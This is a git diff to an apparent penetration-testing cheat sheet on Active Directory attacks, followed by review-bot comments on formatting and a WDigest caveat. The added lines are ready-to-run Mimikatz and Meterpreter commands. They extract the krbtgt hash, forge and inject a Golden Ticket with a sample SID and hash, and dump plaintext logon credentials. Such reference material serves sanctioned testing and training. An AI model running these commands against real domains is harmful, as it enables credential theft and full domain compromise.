diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 1b1c31c..b663a6e 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -44,26 +44,31 @@ Metasploit : windows/gather/credentials/domain_hashdump ``` - * Golden Tickets + * Golden Tickets + Mimikatz version ```c Get info - Mimikatz lsadump::dcsync /user:krbtgt lsadump::lsa /inject /name:krbtgt - Get info - Meterpreter(kiwi) - dcsync_ntlm krbtgt - Forge a Golden ticket - Mimikatz kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt kerberos::tgt + ``` - Forge a Golden ticket - Metasploit - post/windows/escalate/golden_ticket + Meterpreter version + ```c + Get info - Meterpreter(kiwi) + dcsync_ntlm krbtgt + dcsync krbtgt Forge a Golden ticket - Meterpreter load kiwi + golden_ticket_create -d -k -s -u -t golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck + kerberos_ticket_purge kerberos_ticket_use /root/Downloads/pentestlabuser.tck + kerberos_ticket_list ``` * Kerberoast ```c @@ -87,6 +92,7 @@ ``` load mimikatz mimikatz_command -f sekurlsa::logonPasswords full +mimikatz_command -f sekurlsa::wdigest ``` ## PowerSploit diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 71f619d..4aa836d 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -13,6 +13,7 @@ Mimikatz console (multiple commands) PS C:\temp\mimikatz> .\mimikatz mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords +mimikatz # sekurlsa::wdigest ``` Mimikatz Golden ticket
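Review bot: in the first hunk of `Active Directory Attack.md` the two new "Mimikatz version" and "Meterpreter version" blocks are fenced as ```c although they hold Mimikatz and Meterpreter console commands, not C, so the fence tag only produces misleading syntax highlighting; a plain fence would be the honest choice (the existing Kerberoast block right below has the same problem). The bullet `* Golden Tickets` is removed and re-added with what looks like a whitespace-only difference, which is diff noise and should be dropped from the change. The Meterpreter block also places the bare usage line `golden_ticket_create -d -k -s -u -t` directly above the worked command without saying what each flag expects (domain, krbtgt hash, SID, user, ticket output path), and the explanatory lines such as `Get info - Meterpreter(kiwi)` and `Forge a Golden ticket - Meterpreter` sit inside the fence where a reader may take them for commands; a one-line legend for the flags and moving the headings out of the fence (or marking them as comments) would keep the sheet readable.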
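Review bot: the second hunk of `Active Directory Attack.md` adds `mimikatz_command -f sekurlsa::wdigest` right after `sekurlsa::logonPasswords full`, which already enumerates the wdigest provider, so the new line is redundant unless the sheet states why it is listed separately. It also needs a one-line caveat: WDigest plaintext credential caching is disabled by default on Windows 8.1 / Server 2012 R2 and later (and on older hosts with KB2871997 applied), so on a hardened system the command returns no passwords and an empty result is not a failed run. Since re-enabling that caching is a well-known hardening regression that defenders monitor for, the note would also stop readers from misreading the empty output.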
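Review bot: the hunk in `Windows - Mimikatz.md` adds `mimikatz # sekurlsa::wdigest` immediately after `sekurlsa::logonpasswords`, which already reports the wdigest provider, so without a word on the difference the added line duplicates the previous one; if it stays, the same one-line caveat belongs here too, namely that WDigest plaintext caching is off by default on Windows 8.1 / Server 2012 R2 and later, so the entry shows nothing on a patched host. Keeping both sheets consistent on that point avoids the two documents giving different impressions of what the command does.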